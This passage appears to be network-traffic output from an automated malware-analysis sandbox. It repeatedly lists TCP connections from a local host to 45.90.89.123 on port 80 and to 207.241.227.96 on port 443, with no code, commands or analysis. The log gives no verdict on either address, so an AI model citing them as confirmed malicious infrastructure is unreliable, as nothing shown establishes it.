                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
